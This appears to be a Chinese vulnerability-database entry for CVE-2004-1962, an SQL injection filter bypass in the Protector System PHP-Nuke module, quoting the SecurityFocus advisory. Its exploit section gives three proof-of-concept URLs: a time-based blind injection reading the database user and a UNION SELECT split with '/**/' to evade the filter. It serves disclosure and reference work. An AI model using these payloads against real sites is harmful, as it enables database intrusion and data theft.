Protector System index.phpSQL注入过滤器绕过漏洞

Protector System index.phpSQL注入过滤器绕过漏洞

漏洞ID 1107901 漏洞类型 SQL注入
发布时间 2004-04-23 更新时间 2005-10-20
图片[1]-Protector System index.phpSQL注入过滤器绕过漏洞-安全小百科CVE编号 CVE-2004-1962
图片[2]-Protector System index.phpSQL注入过滤器绕过漏洞-安全小百科CNNVD-ID CNNVD-200412-1110
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/24047
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-1110
|漏洞详情
ProtectorSystem1.15b1的index.php存在SQL注入漏洞。远程攻击者可以通过使用目标字段中的“/**/”序列绕过SQL注入过滤器。
|漏洞EXP
source: http://www.securityfocus.com/bid/10206/info

Multiple vulnerabilities were reported to exist in Protector System, which is a third-party module for PHP-Nuke. Cross-site scripting and SQL injection vulnerabilities were reported. 

Exploitation of these issues may reveal sensitive information, allow for account hijacking, content manipulation and attacks against the underlying database.

These issues were reported to exist in Protector System 1.15b1. Other versions may also be affected.

http://www.example.com/nuke72/index.php?foobar%27,IF(ord(mid(USER(),1,1))%3d114,benchmark(500000,md5(1337)),1),2)/*
http://www.example.com/nuke72/index.php?foo=bar%20U/**/NION%20SELECT%20ALL%20FROM%20WHERE
http://www.example.com/nuke72/index.php?foo=bar%20UNION%20SELECT%20ALL%20FROM%20WHERE
|参考资料

来源:BID
名称:10206
链接:http://www.securityfocus.com/bid/10206
来源:XF
名称:protector-sql-filter-bypass(15969)
链接:http://xforce.iss.net/xforce/xfdb/15969
来源:www.waraxe.us
链接:http://www.waraxe.us/index.php?modname=sa&id;=25

相关推荐: Titan FTP Server CWD Command Remote Heap Overflow Vulnerability

Titan FTP Server CWD Command Remote Heap Overflow Vulnerability 漏洞ID 1076668 漏洞类型 Boundary Condition Error 发布时间 2004-08-30 更新时间 20…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享